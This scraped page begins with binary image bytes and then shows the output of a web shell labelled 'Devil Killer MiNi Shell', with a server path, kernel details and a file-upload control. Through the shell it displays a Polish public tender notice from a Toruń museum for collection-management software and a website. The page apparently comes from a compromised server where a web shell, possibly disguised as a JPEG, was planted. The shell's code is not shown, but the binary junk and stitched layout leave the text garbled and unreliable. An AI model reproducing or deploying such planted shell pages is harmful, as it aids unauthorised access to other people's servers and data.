JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231208/0054208101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup dostępu do programu do ewidencji i zarządzania zbiorami, zaprojektowanie, budowa i zapewnienie dostępu do portalu do prezentacji zbiorów online oraz zaprojektowanie, budowa strony internetowej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Pamięć i Tożsamość im. Św. Jana Pawła II (w organizacji) w Toruniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380713458</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Droga Starotoruńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">505 863 669</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@muzeumpamiecitozsamosc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muzeumpit.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup dostępu do programu do ewidencji i zarządzania zbiorami, zaprojektowanie, budowa i zapewnienie dostępu do portalu do prezentacji zbiorów online oraz zaprojektowanie, budowa strony internetowej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-50e92d44-95fc-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00542081</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00336940/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zakup dostępu do programu do ewidencji i zarządzania zbiorami, budowa i zapewnienie dostępu do portalu do prezentacji, zaprojektowanie, budowa strony internetowej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-50e92d44-95fc-11ee-ba3b-4e891c384685 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl<br/>Identyfikator postępowania: ocds-148610-50e92d44-95fc-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, w <br/>tym składanie ofert, dokumentów podmiotowych, oświadczeń, wniosków, zawiadomień oraz <br/>przekazywanie informacji odbywa się przy użyciu środków komunikacji elektronicznej.Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania <br/>Wykonawcy podpisu elektronicznego. <br/>8) Ofertę należy złożyć pod rygorem nieważności w formie elektronicznej opatrzonej elektronicznym <br/>podpisem kwalifikowanym lub podpisem zaufanym lub podpisem osobistym w języku polskim.<br/>9) Ofertę należy złożyć za pośrednictwem Platformy e-zamówienia. <br/>10) Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie <br/>postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system <br/>prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym <br/>znajdują się dwa pola drag &amp; drop („przeciągnij” i „upuść”) służące do dodawania plików.<br/>11) Zamawiający nie udostępnia interaktywnego formularza ofertowego na Platformie. Ofertę należy złożyć <br/>na wzorze „Formularza oferty”, stanowiącym załącznik nr 2 do SWZ. <br/>12) Wykonawca dodaje uprzednio wypełniony i podpisany „Formularz oferty” w pierwszym polu <br/>(„Wypełniony formularz oferty”). W kolejnym polu („Załączniki i inne dokumenty przedstawione w <br/>ofercie przez Wykonawcę”), Wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z <br/>ofertą. <br/>13) Numer referencyjny nadany sprawie przez Zamawiającego: MPiTJPII/ZP-01/12/2023/PK<br/>14) Formularz ofertowy podpisuje się podpisem kwalifikowalnym lub podpisem zaufanym lub podpisem <br/>osobistym.<br/>Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia <br/>2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie <br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych) (Dz. Urz. UE L 119 z 4.05.2016, str. 1), dalej „RODO”, informuję że: <br/>1) administratorem Pani/Pana danych osobowych jest Muzeum „Pamięć i Tożsamość” im. św. Jana Pawła II (w <br/>organizacji), ul. Droga Starotoruńska 3, 87-100 Toruń, NIP 9562337347, REGON 380713458,<br/>2) wpisane do Rejestru Instytucji Kultury prowadzonego przez Ministra Kultury i Dziedzictwa Narodowego pod <br/>numerem RIK 110/2018, <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z <br/>postępowaniem o udzielenie zamówienia publicznego objętego niniejszym postępowaniem, <br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 i 74 ustawy Prawo zamówień publicznych, <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Prawo zamówień publicznych, przez <br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 <br/>lata, okres przechowywania obejmuje cały czas trwania umowy, <br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem <br/>ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w <br/>postępowaniu o udzielenie zamówienia publicznego, <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, <br/>stosownie do art. 22 RODO, <br/>8) posiada Pani/Pan: − na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, <br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, Znak sprawy: MPiTJPII/ZP 01/12/2023/PK − na podstawie art. 18 RODO prawo żądania od administratora ograniczania przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2, − prawo do wniesienia <br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych <br/>Pani/Pana dotyczących narusza przepisy RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych <br/>osobowych, − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, − na podstawie art. <br/>21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania <br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO. <br/>2) skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie <br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień <br/>publicznych oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>3) prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu <br/>zapewnienia korzystania ze środków ochrony prawnej, lub z uwagi na ważne względu interesu publicznego Unii <br/>Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MPiTJPII/ZP-01/12/2023/PK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadania pt. „Zakup dostępu do programu do ewidencji i zarządzania <br/>zbiorami wraz z wykonaniem modyfikacji zlecanych przez Muzeum Pamięć i Tożsamość im. św. Jana Pawła II <br/>w Toruniu (w organizacji), zaprojektowanie, budowa i zapewnienie dostępu do portalu do prezentacji zbiorów <br/>online oraz zaprojektowanie, budowa strony internetowej Muzeum”<br/>1) Szczegółowy opis przedmiotu zmówienia oraz warunki jego realizacji zawarte są Opisie przedmiotu <br/>zamówienia - Załącznik nr 1 do SWZ, Wzorze umowy - Załącznik nr 10 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72243000-0 - Usługi programowania</p> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wznowienie postępowania nastąpi przed zakończeniem umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert, które nie zostały odrzucone wyłącznie na <br/>podstawie kryterium oceny ofert, którym są:<br/>1) Cena C0 (w rozumieniu wartość brutto zamówienia czyli wartość brutto umowy) – waga 60%, gdzie <br/>punkty wyliczane są wg następującego wzoru:<br/> CMIN<br/>Liczba punktów zdobytych w kryterium C0 = --------------- x 60 pkt<br/> CB<br/>C0 – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w <br/>kryterium cena 60%<br/>CMIN – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu<br/>CB – zaproponowana cena oferty badanej<br/>Wartości punktowe w kryterium zostaną podane z dokładnością do dwóch miejsc po przecinku, a <br/>zaokrąglenie zostanie dokonane zgodnie z ogólnie przyjętymi zasadami matematyki.<br/>2) Doświadczenie zespołu – waga 40 % ocenie podlega dodatkowe doświadczenie osób, które będą <br/>pełniły funkcję; Kierownika Projektu, Kierownika/Kierowniczki Zespołu programistów, Programista, <br/>Kierownik Testów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zespołu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określił w ogłoszeniu o zamówieniu oraz w SWZ warunki udziału w niniejszym postępowaniu <br/>dot.:<br/>a.) zdolności technicznej lub zawodowej, żądając aby Wykonawca wykazał, że:<br/>- posiada doświadczenie w zakresie wykonania usług, odpowiadających przedmiotowi zamówienia tj. wykonał w <br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/>krótszy – w tym okresie:<br/>1) co najmniej dwie usługi (umowy), z których każda polegała na wdrożeniu systemu informatycznego do <br/>przetwarzania danych oraz ewidencji i zarządzania tymi danymi, przeznaczonego do katalogowania zbiorów <br/>muzealnych oraz obsługi procedur (akcesja, wypożyczenia), obsługującego bazę danych zawierającą nie mniej niż <br/>40 000 rekordów (przez rekord należy rozumieć pojedynczy obiekt wpisany do inwentarza w jednej instytucji) o <br/>wartości netto nie mniejszej niż 200.000,00 zł. (wartość zamówienia nie może dotyczyć zakupów sprzętu i<br/>wyposażenia).<br/>oraz<br/>2) co najmniej dwie usługi (umowy), z których każda polegała na wykonaniu portalu internetowego <br/>zintegrowanego z systemem do ewidencji zbiorów muzealnych, który służy do udostępniania w domenie <br/>publicznej zdigitalizowanych zbiorów i każda o wartości netto nie mniejszej niż 50.000,00 zł.<br/>Uwaga: W przypadku, gdy Wykonawca powołuje się na doświadczenie w realizacji usług, o których mowa <br/>powyżej, które wykonywał wspólnie z innymi wykonawcami, Zamawiający będzie uznawał jedynie te usługi, w <br/>których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/>3) dysponuje osobami zdolnymi do wykonania zamówienia, które są skierowane przez Wykonawcę do realizacji <br/>zamówienia,<br/>3.1) Kierownik Projektu - dysponuje osobami zdolnymi do realizacji zamówienia, tj.: <br/>Kierownik/Kierowniczka Projektu - 1 osoba posiadająca: <br/>− wykształcenie wyższe<br/>− potwierdzone dyplomem ukończenia studiów wyższych,<br/>− wiedza z zakresu zarządzania projektami, potwierdzona certyfikatem znajomości metodologii procesu <br/>zarządzania projektami ze szczegółowym uwzględnieniem złożonych projektów informatycznych –<br/>PRINCE 2 Practitioner, AgilePM Practitioner lub równoważne, <br/>− wiedza w zakresie zarządzania usługami utrzymaniowymi utworzonego oprogramowania, potwierdzona <br/>certyfikatem: ITIL 3 Foundation lub wyższym, <br/>− co najmniej 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika projektów lub<br/>równoważnej dla projektów informatycznych, <br/>− doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany <br/>okres co najmniej 6 miesięcy pełniła funkcję osoby koordynującej / kierującej projektem, tj. <br/>koordynującej prace całego zespołu w projekcie, w co najmniej 2 zakończonych zamówieniach / <br/>projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do <br/>katalogowania zbiorów muzealnych oraz obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), <br/>obsługującego relacyjną bazę danych zawierającą nie mniej niż 30 000 rekordów (poprzez rekord należy <br/>rozumieć pojedynczy obiekt wpisany do inwentarza muzealnego w jednej instytucji), o wartości nie <br/>mniejszej niż 200 000,00 zł. netto każda<br/>3.2.) Kierownik/Kierowniczka Zespołu Programistów - 1 osoba posiadająca: <br/>- wykształcenie wyższe; <br/>Znak sprawy: MPiTJPII/ZP-01/12/2023/PK<br/>12<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co <br/>najmniej 6 miesięcy pełnił funkcję kierownika zespołu programistów, tj. koordynującej prace zespołu <br/>informatycznego, składającego się z programistów backendowych, frontendowych, specjalistów ds. sieci, <br/>utrzymania, w co najmniej 2 w co najmniej 2 zakończonych zamówieniach / projektach, polegających na <br/>dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do katalogowania zbiorów muzealnych oraz <br/>obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), obsługującego relacyjną bazę danych zawierającą nie <br/>mniej niż 30 000 rekordów (poprzez rekord należy rozumieć pojedynczy obiekt wpisany do inwentarza <br/>muzealnego w jednej instytucji), o wartości nie mniejszej niż 200 000,00 zł. netto każda<br/>3.3) Programista - 3 osoby posiadające: <br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny); <br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co <br/>najmniej 6 miesięcy pełniła funkcję Programisty, tj. osoby odpowiedzialnej za właściwe realizowanie <br/>funkcjonalności wskazanych w dokumentacji analitycznej w co najmniej 2 zakończonych zamówieniach / <br/>projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do <br/>katalogowania zbiorów muzealnych oraz obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), <br/>obsługującego relacyjną bazę danych zawierającą nie mniej niż 30 000 rekordów (poprzez rekord należy rozumieć <br/>pojedynczy obiekt wpisany do inwentarza muzealnego w jednej instytucji), o wartości nie mniejszej niż <br/>200 000,00 zł. netto każda<br/>3.4) Kierownik Testów - 1 osoba posiadająca: <br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny); - aktualny certyfikat ISTQB <br/>Certified Tester Advanced – na poziomie minimum Test Manager lub równoważny; <br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co <br/>najmniej 6 miesięcy pełniła funkcję Kierownika testów, tj. osoby odpowiedzialnej za nadzór nad testowaniem <br/>poszczególnych komponentów oprogramowania w co najmniej 2 zakończonych zamówieniach / projektach, <br/>polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do katalogowania zbiorów <br/>muzealnych oraz obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), obsługującego relacyjną bazę <br/>danych zawierającą nie mniej niż 30 000 rekordów (poprzez rekord należy rozumieć pojedynczy obiekt wpisany <br/>do inwentarza muzealnego w jednej instytucji), o wartości nie mniejszej niż 200 000,00 zł. netto każda.<br/>UWAGA - Zamawiający pod pojęciem „zbiory muzealne” rozumie jednostki muzealne lub prowadzące działalność <br/>o charakterze muzealnym, posiadające zbiory, których wolumen obejmuje co najmniej 100 000 obiektów, w tym <br/>kolekcje prywatne, samorządowe lub inne realizujące procedury muzealne w zakresie: <br/>a) Procesu akcesji obiektów do jednostki <br/>b) Procesu ewidencji i inwentaryzacji zbiorów <br/>c) Procesów konserwatorskich zbiorów <br/>d) Procesów wypożyczeni, udzielania w depozyt i innych form ruchu obiektów <br/>e) Procesów tworzenia i obsługi słowników tematycznych<br/>b.) Zamawiający nie określił w ogłoszeniu o zamówieniu oraz w SWZ warunków udziału w niniejszym <br/>postępowaniu dotyczących:<br/>1) zdolności do występowania w obrocie gospodarczym; <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z <br/>odrębnych przepisów; <br/>3) sytuacji ekonomicznej lub finansowej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w niniejszym <br/>postępowaniu o udzielenie zamówienia 